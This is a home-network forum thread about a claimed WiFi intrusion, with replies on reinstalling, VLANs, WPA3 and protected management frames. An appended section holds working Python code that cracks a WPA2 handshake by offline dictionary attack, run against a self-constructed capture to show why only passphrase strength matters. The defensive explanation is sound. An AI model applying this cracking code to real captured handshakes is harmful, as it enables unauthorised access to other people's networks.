OPNsense got hacked

Started by nicholaswkc, February 16, 2026, 09:25:12 AM

February 16, 2026, 09:25:12 AM Last Edit: February 16, 2026, 09:31:07 AM by nicholaswkc
Dear all forumers, I have been hacked by hackers who connected to my home 2.4G WiFi and embedded backdoors like a .bat file (for a simple connect to host) or macro-enabled files into my Word/Excel files.
I know it may sound ridiculous, but it's true.

How do I get rid of this situation? Any solution to it?
Install Avast antivirus or Malwarebytes?

Any software that monitors my connection to the outside world (Wireshark or better)?

And how exactly is it your OPNsense that was hacked?

Solution: reinstall all affected systems. Make sure to apply all software updates. Don't use unsupported systems like e.g. Windows 10.
Deciso DEC750
People who think they know everything are a great annoyance to those of us who do. (Isaac Asimov)

February 16, 2026, 10:17:11 AM #2 Last Edit: February 16, 2026, 10:22:24 AM by nicholaswkc Reason: Add more info
Hacked through 2.4G (WPA2) WiFi; they left a .bat file and embedded a bat script into a Word file. I had discontinued Win10 for security reasons.

Even my portable HD had a backdoor in it. I just did a clean install on everything and disabled USB storage also.

All my country's mobile data is exposed to hacking.

Solution: change WiFi password, reinstall all affected systems. Make sure to apply all software updates. Don't use unsupported systems like e.g. Windows 10.

1. What was hacked seems to be your Windows 11 PC, not OpnSense. Why? Because it does not even make sense to install a .bat file there. Which hacker in his right mind would try to install a payload for a Windows PC on a FreeBSD box?

2. How do you know what the way of intrusion was? "Hacked through 2.4G wifi" can mean anything. I would argue that you surfed the wrong websites and the infection was via a browser exploit.

Nothing of this is inherently linked to OpnSense, so the thread title is misleading. Unless, of course, you expect OpnSense to protect your end devices from OSI layer 8 problems... ;-)
Intel N100, 4* I226-V, 2* 82559, 16 GByte, 500 GByte NVME, ZTE F6005

1100 down / 800 up, Bufferbloat A+

Quote from: meyergru on February 16, 2026, 10:23:38 AM
1. What was hacked seems to be your Windows 11 PC, not OpnSense. Why? Because it does not even make sense to install a .bat file there. Which hacker in his right mind would try to install a payload for a Windows PC on a FreeBSD box?

2. How do you know what the way of intrusion was? "Hacked through 2.4G wifi" can mean anything. I would argue that you surfed the wrong websites and the infection was via a browser exploit.

Nothing of this is inherently linked to OpnSense, so the thread title is misleading. Unless, of course, you expect OpnSense to protect your end devices from OSI layer 8 problems... ;-)


1. All my country's Linux-based systems cannot browse websites unless using a VPN.
2. WiFi hacking is quite easy once you master it. They force you to disconnect and reconnect, then they get the plain authentication.

My solution to this: disable WiFi completely in my house network.

Can the OPNsense be affected also if a hacker got access to the LAN?

That depends on your security setup for Opnsense. HTTP or HTTPS access? From which [v]LANs? Quality of password or phrase? 2FA? SSH access? Password or passkey for that? Much of that is discussed here.

You can also run a security audit.
Deciso DEC697

Quote from: nicholaswkc on February 16, 2026, 10:46:10 AM
Can the OPNsense be affected also if a hacker got access to the LAN?

Internal firewall rules with separate zones/interfaces for WiFi/Client/DMZ/Core/etc. I would advise using VLANs if you can; otherwise subnetting with /24s is a good idea.

From what I've read, you might also want to turn on MAC-Address filters on your WAPs and/or OPNSense's DHCP, good luck!
Custom: ASRock 970 Extreme3 R2.0 / AMD FX-8320E / 32 GB DDR3 1866 / X520 & I350 / 500GB SATA

Quote from: jonny5 on February 17, 2026, 04:34:01 PM
Quote from: nicholaswkc on February 16, 2026, 10:46:10 AM
Can the OPNsense be affected also if a hacker got access to the LAN?

Internal firewall rules with separate zones/interfaces for WiFi/Client/DMZ/Core/etc. I would advise using VLANs if you can; otherwise subnetting with /24s is a good idea.

From what I've read, you might also want to turn on MAC-Address filters on your WAPs and/or OPNSense's DHCP, good luck!

I have MAC filtering enabled. No SSH and no open ports. How do I create VLANs or subnetting?

Today at 02:06:03 PM #10 Last Edit: Today at 02:32:59 PM by falken
Quote from: nicholaswkc on Today at 02:54:58 AM
I have MAC filtering enabled. No SSH and no open ports. How do I create VLANs or subnetting?


That's a little more involved than a forum post (IMO anyway). I would suggest reading through Google, or maybe even asking an AI model for starting steps.
It is absolutely a WiFi and configuration issue though. OPNsense won't automatically protect you if someone can connect to your WiFi, join your main LAN, and then communicate directly with the rest of your LAN devices on the same LAN/VLAN/subnet. The MAC address filtering won't help much, as if it is happening in the way you described they can just spoof the MAC address they got from the session they sniffed anyway.

Also, move to WPA3 if able. I understand you likely have legacy devices that do not support it though, so it's not as easy as said.
See if you can enable PMF (Protected Management Frames): enable 802.11w or Protected Management Frames (PMF) in your router settings to prevent attackers from deauthenticating your devices to force a re-handshake. While not foolproof, it does lower the attack vector. Once again though, everything you have may not support it, so you will need to see what, if anything, breaks.

Edit: realistically, if that is the attack method, you have an extremely weak WiFi password as well. Upgrade to a nice long random password.
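The attack nicholaswkc and falken describe (deauth, capture the re-handshake, then guess the passphrase offline) as an added example, not code from this thread or from OPNsense. It implements the WPA2 key derivation from IEEE 802.11i (PBKDF2 to the PMK, PRF-512 to the PTK, HMAC-SHA1 MIC over EAPOL-Key message 2) and runs a dictionary attack against a handshake it constructs itself: the SSID, both MAC addresses, both nonces, the wordlist and the frame contents are all made up for the demonstration, whereas a real tool would take those fields from a sniffed pcap. Nothing here is sent on the air.

```python
import hashlib
import hmac

# Constructed values for the demonstration (assumptions, not taken from the thread):
SSID = "HomeWiFi-2.4G"
AP_MAC = bytes.fromhex("02a1b2c3d4e5")             # constructed AP address
STA_MAC = bytes.fromhex("02f6e5d4c3b2")            # constructed client address
ANONCE = hashlib.sha256(b"demo-anonce").digest()   # deterministic 32-byte stand-in nonces
SNONCE = hashlib.sha256(b"demo-snonce").digest()
MIC_OFFSET = 81   # EAPOL header (4) + key descriptor fields preceding the MIC (77)


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(pmk: bytes, a_mac: bytes, s_mac: bytes, a_nonce: bytes, s_nonce: bytes) -> bytes:
    """802.11i PRF-512: expand the PMK into the 64-byte PTK from both MACs and both nonces."""
    data = min(a_mac, s_mac) + max(a_mac, s_mac) + min(a_nonce, s_nonce) + max(a_nonce, s_nonce)
    out = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def eapol_mic(kck: bytes, frame_with_zeroed_mic: bytes) -> bytes:
    """WPA2 key descriptor version 2: MIC = HMAC-SHA1(KCK, EAPOL frame)[:16]; KCK = PTK[:16]."""
    return hmac.new(kck, frame_with_zeroed_mic, hashlib.sha1).digest()[:16]


def build_msg2(s_nonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """Construct a minimal EAPOL-Key message 2 (client -> AP) carrying the given MIC field."""
    body = (
        b"\x02"                      # descriptor type: RSN (WPA2)
        + b"\x01\x0a"                # key info: MIC bit, pairwise, key descriptor version 2
        + b"\x00\x10"                # key length
        + b"\x00" * 7 + b"\x01"      # replay counter
        + s_nonce                    # SNonce (32 bytes)
        + b"\x00" * 16               # key IV
        + b"\x00" * 8                # key RSC
        + b"\x00" * 8                # key ID
        + mic                        # MIC (16 bytes, zeroed while computing it)
        + b"\x00\x00"                # key data length (no RSN IE in this constructed frame)
    )
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body


def capture_handshake(passphrase: str, ssid: str = SSID) -> bytes:
    """Stand-in for sniffing: the message 2 a real client would send for this passphrase."""
    ptk = prf512(wpa2_pmk(passphrase, ssid), AP_MAC, STA_MAC, ANONCE, SNONCE)
    return build_msg2(SNONCE, eapol_mic(ptk[:16], build_msg2(SNONCE)))


def crack_handshake(msg2: bytes, wordlist, ssid: str = SSID):
    """Offline dictionary attack on a captured message 2: PMK -> PTK -> KCK, compare MICs."""
    captured_mic = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = msg2[:MIC_OFFSET] + b"\x00" * 16 + msg2[MIC_OFFSET + 16:]
    for candidate in wordlist:
        ptk = prf512(wpa2_pmk(candidate, ssid), AP_MAC, STA_MAC, ANONCE, SNONCE)
        if hmac.compare_digest(eapol_mic(ptk[:16], zeroed), captured_mic):
            return candidate
    return None


WORDLIST = ["password", "12345678", "qwerty123", "homewifi", "sunshine1"]  # constructed


def demo():
    """A dictionary passphrase is recovered from the capture; a long random one is not."""
    weak = crack_handshake(capture_handshake("homewifi"), WORDLIST)
    strong = crack_handshake(capture_handshake("vK9#mL2$wQ8@pR4&zT6!nH3"), WORDLIST)
    return weak, strong


if __name__ == "__main__":
    print(demo())
```

Two things follow from the code. First, the MAC addresses are inputs to the PTK, so they are already in the attacker's hands after the sniff, which is why MAC filtering buys nothing. Second, everything after the capture is offline and parallelisable, so the only cost the defender controls is the passphrase's entropy: the 4096 PBKDF2 rounds slow a guess down but cannot rescue a word that is in a wordlist. PMF (802.11w) removes the deauth that forces the re-handshake, and WPA3's SAE is a password-authenticated key exchange, so the same capture yields nothing to test guesses against.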